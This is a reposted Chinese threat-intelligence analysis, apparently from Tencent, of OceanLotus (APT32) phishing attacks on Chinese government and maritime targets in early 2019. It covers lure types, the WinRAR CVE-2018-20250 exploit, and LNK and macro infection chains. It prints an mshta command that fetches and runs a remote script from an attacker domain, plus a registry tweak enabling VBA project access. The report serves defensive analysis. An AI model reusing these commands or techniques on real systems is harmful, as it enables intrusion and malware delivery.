| 关键词: 攻击 文件 恶意 攻击者 木马 诱饵 shellcode 莲花 文档 函数 |
一、背景 “海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动的最活跃的APT攻击组织之一。 在2019年第一季度,腾讯御见威胁情报中心持续的检测到该组织针对中国大陆的政府、海事机构、商务部门、研究机构的攻击活动。此外该组织还在不断的更新他们的攻击武器库,无论是钓鱼的诱饵形式、payload的加载、横向移动等。尤其值得注意的是,我们发现该组织针对不同的机器下发不同的恶意模块,使得即便恶意文件被安全厂商捕捉到,也因为无相关机器特征而无法解密最终的payload,无法知晓后续的相关活动。 活动钻石模型如下: ![]() ![]() 二、技术分析 1、 初始攻击 恶意文件投递的方式依然是最常用的鱼叉攻击的方式,钓鱼关键字包括”干部培训”,”绩效”,”工作方向”,”纪检监察”等,相关的邮件如下: ![]() ![]() ![]() 除此该次攻击还新增了敏感内容的主题,用户吸引被攻击者打开,如敏感图片: ![]() 2、 诱饵类型 2019年一季度投递的恶意诱饵类型众多,包括白加黑、lnk、doc文档、带有WinRARACE(CVE-2018-20250)漏洞的压缩包等。 1) 白加黑 ![]() ![]() 2) 恶意lnk ![]() 3) 带有宏的恶意doc文档 4) 带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包: ![]() ![]() 3、 恶意文件植入 1) 恶意lnk分析 在1月的一波攻击中,该组织会在所有的投递的压缩包里,都存放一个恶意的lnk,但是所有的lnk文件都类似(执行的地址不能,但是内容一致)。lnk文件的图标伪装成word图标。值得注意的是,该lnk的图标会从网络获取,因此如果远程服务器已经关闭,会导致该lnk无图标的现象。此外,还会造成即便不双击lnk,只要打开lnk所在的目录,就会出现网络连接的现象。 该现象的原因是:explorer解析lnk的时候会去解析图标,而这个lnk配置的图标在网络上,因此会自动去下载,但只是下载,不会执行,看一眼不运行lnk文件的话,会泄漏自身ip地址,但不会导致电脑中木马。 双击运行lnk后,会执行下列命令: C:WindowsSysWOW64mshta.exehttp://api.baidu-json.com/feed/news.html 其中, news.html实际为一个vbs脚本文件: ![]() mstha执行此脚本本后会解密脚本中存储的内容,并存储到%temp%目录下,文件名分别为: 7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp ![]() 解密算法如下所示: ![]() 接着调用系统自带的odbcconf.exe,将7b95ffab-3a9c-494a-a584-9c48dc7aa6a7.tmp(dll文件)给加载起来。最后调用taskkill.exe,结束mshta.exe进程: 但是奇怪的是,由于解密算法的问题,导致最终的解密失败,因此执行该lnk,用户实际并不会中招: 从而我们猜测该方式可能还处于测试阶段,或者作者由于疏忽导致。不过在后续的攻击活动中,我们未再次检测到该攻击方式。 2) 带有宏的doc文档 带有宏的文档的投递,是该组织比较常用的恶意诱饵,如: 此外,Twitter上也有不少安全同仁曝光过该组织的该方式的诱饵: ![]() 此外疑似作者还在VT上跟相关研究员互动: ![]() 当然,我们更相信该用户可能只是安全研究员之间的一个玩笑。 执行宏后,首先会复制原始文档到%temp%下,命名为随机名文件: ![]() 然后解密出一个新的VBA宏: ![]() 接着设置注册表 ”HKEY_CURRENT_USERSoftwareMicrosoftOffice .0WordSecurityAccessVBOM”的值为1: ![]() 最后打开之前复制的doc文件,并将原始VBA宏擦除,将解密后的新的VBA宏添加进去,并启动VBA宏函数 x_N0th1ngH3r3: x_N0th1ngH3r3函数同样是解密出一段新VBA宏,同样调用新VBA宏的x_N0th1ngH3r3函数: ![]() 解密出来的新VBA宏目的是将shellcode解密并加载执行: ![]() Shellcode解密出一个DLL文件,并在内存中加载,执行DllEntry函数: ![]() 本文出处: https://www.toutiao.com/a6684000320902660622/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|